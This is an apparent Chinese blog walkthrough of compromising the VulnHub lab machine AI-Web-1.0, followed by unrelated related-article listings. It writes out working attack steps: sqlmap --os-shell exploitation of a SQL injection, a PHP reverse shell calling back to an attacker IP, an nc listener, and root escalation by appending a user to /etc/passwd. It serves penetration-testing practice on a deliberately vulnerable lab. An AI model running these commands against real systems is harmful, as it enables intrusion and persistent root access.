vulnhub靶机AI-Web-1.0

这篇具有很好参考价值的文章主要介绍了vulnhub靶机AI-Web-1.0。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

靶机信息

主机信息

网站信息

SQL注入

权限提升

flag

靶机信息

靶机界面

vulnhub靶机AI-Web-1.0,服务器,linux,网络

确认攻击机和靶机在同一网段

vulnhub靶机AI-Web-1.0,服务器,linux,网络

主机信息

查看下当前网段存活的主机

sudo arp-scan -l 

vulnhub靶机AI-Web-1.0,服务器,linux,网络

靶机的ip地址为10.4.7.145

扫下ip开放的端口

sudo nmap -A -p- -sS -sC -T4 10.4.7.145

vulnhub靶机AI-Web-1.0,服务器,linux,网络

这边就开放了一个80 端口是一个Apache httpd

网站信息

访问下网页

vulnhub靶机AI-Web-1.0,服务器,linux,网络

这个大概意思就是 连谷歌都搜不到我的信息

源码里也没什么有用的信息

vulnhub靶机AI-Web-1.0,服务器,linux,网络

扫下他网页的目录信息

dirb http://10.4.7.145  

vulnhub靶机AI-Web-1.0,服务器,linux,网络

扫出来3个文件index.html、robots.txt、server-status,都去访问一下

10.4.7.145/index.html

vulnhub靶机AI-Web-1.0,服务器,linux,网络

10.4.7.145/robots.txt

vulnhub靶机AI-Web-1.0,服务器,linux,网络

访问robots.txt文件,里面发现有两个目录,这个文件大概的意思就是不允许爬取这两个文件。

(此地无银三百两,我就得看看)

10.4.7.145/m3diNf0

vulnhub靶机AI-Web-1.0,服务器,linux,网络

10.4.7.145/se3reTdir777/uploads

vulnhub靶机AI-Web-1.0,服务器,linux,网络

网页上发现的目录都没有权限访问

接着访问下扫出来的最后一个目录

10.4.7.145/server-status

vulnhub靶机AI-Web-1.0,服务器,linux,网络

还是没有权限

接着扫下网页里发现目录

dirb http:10.4.7.145/m3diNf0

vulnhub靶机AI-Web-1.0,服务器,linux,网络

发现这个目录里有info.php文件,访问看看

(info.php里面就是服务器上的PHP配置信息,这个页面会列出PHP版本、服务器操作系统、PHP配置参数等信息)

10.4.7.145/m3diNf0/info.php

vulnhub靶机AI-Web-1.0,服务器,linux,网络

里面没有什么有用信息,但是看到了这个文件的路径信息

这次扫下se3reTdir777

dirb http://10.4.7.145/se3reTdir777

vulnhub靶机AI-Web-1.0,服务器,linux,网络

这边有个index.php文件,(这是个网站的默认首页文件)访问一下

http://10.4.7.145/se3reTdir777/index.php

vulnhub靶机AI-Web-1.0,服务器,linux,网络

这边显示有个输入框,可能会有sql注入漏洞

SQL注入

上msfconsle

sqlmap -u "http://10.4.7.145/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell

用msf意味着攻击者可以获得对目标系统的更高级别的访问权限,并且可以执行各种操作

sqlmap:用于检测和利用 Web 应用程序中的 SQL 注入漏洞。它能够自动化地检测、识别和利用多种类型的 SQL 注入漏洞,从而获取目标数据库中的敏感信息

--os-shell:选项会利用数据库服务器上的SQL注入漏洞,获取操作系统级别的命令行访问权限

vulnhub靶机AI-Web-1.0,服务器,linux,网络

vulnhub靶机AI-Web-1.0,服务器,linux,网络

第一个问题是web服务器支持那种web应用程序语言

第四个php

第二个问题是你想用什么作为可写目录

第二个自定义位置

下面就是要选择文件路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

(根据前面找到的info.php文件暴露的信息,绝对路径选择:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/)

这样就进入靶机系统os-shell命令行了(通过Shell,用户可以管理文件、运行程序、配置系统等操作。)

vulnhub靶机AI-Web-1.0,服务器,linux,网络

在kali里写一个php远程shell,ip是kali的ip

<?php
$sock=fsockopen("10.4.7.130",8848);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

vulnhub靶机AI-Web-1.0,服务器,linux,网络

在创建的php文件里打开终端,开启一个简单的http服务

vulnhub靶机AI-Web-1.0,服务器,linux,网络

访问下网页看看文件是否上传成功

vulnhub靶机AI-Web-1.0,服务器,linux,网络

回到靶机shell窗口将文件下载下来

wget -S http://10.4.7.130:8848/niuma.php
 

可能会出现好几次异常,多下几次就可以下载了!

权限提升

关闭http服务

在kali里再打开一个终端,设置监听端口为8848

nc -lnvp 8848

然后靶机执行刚下载的niuma文件

php niuma.php

vulnhub靶机AI-Web-1.0,服务器,linux,网络

看看监听到没

vulnhub靶机AI-Web-1.0,服务器,linux,网络

用python交互式可以看到用户的同时也能看到文件路径

python -c 'import pty;pty.spawn("/bin/bash")'

vulnhub靶机AI-Web-1.0,服务器,linux,网络

当前用户不是root,但有/etc/password文件的写入权限

尝试添加一个用户登录,因为写入的时候密码是加密的,所以要先加密密码

openssl passwd -1 -salt web1 123456

vulnhub靶机AI-Web-1.0,服务器,linux,网络

再写入密码

echo 'web1:$1$web1$ZrYgDZgZpLlsnVlxUaZwh/:0:0::/root:/bin/bash'>>/etc/passwd

vulnhub靶机AI-Web-1.0,服务器,linux,网络

切换创建的web1用户,已经是root权限了

vulnhub靶机AI-Web-1.0,服务器,linux,网络

vulnhub靶机AI-Web-1.0,服务器,linux,网络

flag

vulnhub靶机AI-Web-1.0,服务器,linux,网络文章来源地址https://www.toymoban.com/news/detail-840602.html

到了这里,关于vulnhub靶机AI-Web-1.0的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • Spring Security 6.x 系列【28】授权服务器篇之Spring Authorization Server 1.0 入门案例

    Spring Security 6.x 系列【28】授权服务器篇之Spring Authorization Server 1.0 入门案例

    有道无术,术尚可求,有术无道,止于术。 本系列Spring Boot 版本 3.0.4 本系列Spring Security 版本 6.0.2 本系列Spring Authorization Server 版本 1.0.2 源码地址:https://gitee.com/pearl-organization/study-spring-security-demo 在前几篇文档中,我们学习了 OAuth 2.0 协议,并使用 spring-security-oauth2-client 完成

    2024年02月12日
    浏览(11)
  • 锐捷RSR系列路由器——VPN功能——L2TP_VPDN1.0——L2TP 服务器典型配置

    锐捷RSR系列路由器——VPN功能——L2TP_VPDN1.0——L2TP 服务器典型配置

    目录 01  L2TP 强制隧道模式——用户本地认证 02  L2TP 强制隧道模式——AAA本地认证 03  VPDN 1.0域剥离认证——本地认证 04  VPDN 1.0域剥离认证——AAA认证 功能介绍 L2TP强制隧道模式: 在强制隧道模式下,LAC端终结来自远程接入客户的呼叫,然后通过中间网络以隧道方式将PPP会

    2024年02月04日
    浏览(11)
  • 搭建web服务器和NFS服务器

    搭建web服务器和NFS服务器

    网站需求: 1.基于域名www.openlab.com可以访问网站内容为 welcome to openlab!!! 2.给该公司创建三个子界面分别显示学生信息,教学资料和缴费网站,基于www.openlab.com/student/ 网站访问学生信息,www.openlab.com/data/网站访问教学资料www.openlab.com/money/网站访问缴费网站。 3.要求 (1)学生

    2024年01月23日
    浏览(6)
  • 【Vulnhub】搭建Vulnhub靶机

    【Vulnhub】搭建Vulnhub靶机

    Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 去vulnhub的官网 https://www.vulnhub.com可以看到各种镜像。 点击某一个进入我们可以看到关于镜像的详细信息,包括:镜像描述、难度等级、下载地址等。 通过下载地址下载完成

    2024年02月05日
    浏览(8)
  • Web入门-Web服务器

    Web入门-Web服务器

    Web服务器是一个程序软件, 对HTTP协议的操作进行封装 ,使得程序员不必直接对程序进行操作,让Web开发更加便捷, 简化web程序开发 。主要功能是“通过网上信息浏览服务”。 概念:Tomcat是阿Apache软件基金会一个核心项目,是一个开源免费轻量级的web服务器,支持Servlet/J

    2024年02月13日
    浏览(10)
  • 华纳云:web服务器和www服务器有什么区别?

    在这个数字化时代,互联网已经成为我们生活、学习和工作不可或缺的一部分。每天,我们都会通过各种设备访问无数的网页和网站,而这些网页和网站的背后,就是web服务器和www服务器。虽然这两种服务器在功能上有所相似,但它们之间还是存在着明显的区别。今天,就让

    2024年01月23日
    浏览(10)
  • 如何在虚拟专用服务器上配置 Nginx Web 服务器

    本文档涵盖的是不再受支持的 Ubuntu 版本。如果您目前正在运行 Ubuntu 12.04 服务器,我们强烈建议升级或迁移到受支持的 Ubuntu 版本: 升级到 Ubuntu 14.04 从 Ubuntu 14.04 升级到 Ubuntu 16.04 将服务器数据迁移到受支持的版本 原因: Ubuntu 12.04 已于 2017 年 4 月 28 日到达生命周期终点(

    2024年04月27日
    浏览(14)
  • 为一台计算机配置Web服务器,DNS服务器与DHCP服务器

    为一台计算机配置Web服务器,DNS服务器与DHCP服务器

    实验目的:为一台计算机配置Web服务器,DNS服务器与DHCP服务器 事先准备:三台纯净虚拟机(以下简称为虚拟机A,虚拟机B,虚拟机C)和一台主机 一、配置静态IP 因为要保证实验畅通,所以必须把四台机器配置成同一网段,使用同一网卡 1、首先保证三台虚拟机的网络适配器

    2024年02月11日
    浏览(22)
  • Web服务器

    Web服务器

    目录 什么是Web服务器? Web容器 Servlet Servlet 规范 Servlet 的API结构 编写Servlet servlet生命周期(产生到销毁的过程) 服务器产生响应信息的两种格式         Web服务器是一个程序,用于接收客户端的请求并将响应发送回客户端。它通常用于处理静态内容,例如HTML文件、图像

    2024年02月03日
    浏览(4)
  • 搭建web服务器

    搭建web服务器

    1.要求搭建web服务器,能够访问到网页内容为“小胖,你咋这么胖呢!” 2.要求搭建web服务器,创建基于域名的虚拟主机,能够使用www.xiaopang.com和www.dapang.com访问各自的网站网站存放路径分别为/xiaopang和/dapang,内容自定。 配置yun源:  安装软件包 添加成功后重启服务端:

    2024年02月09日
    浏览(10)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包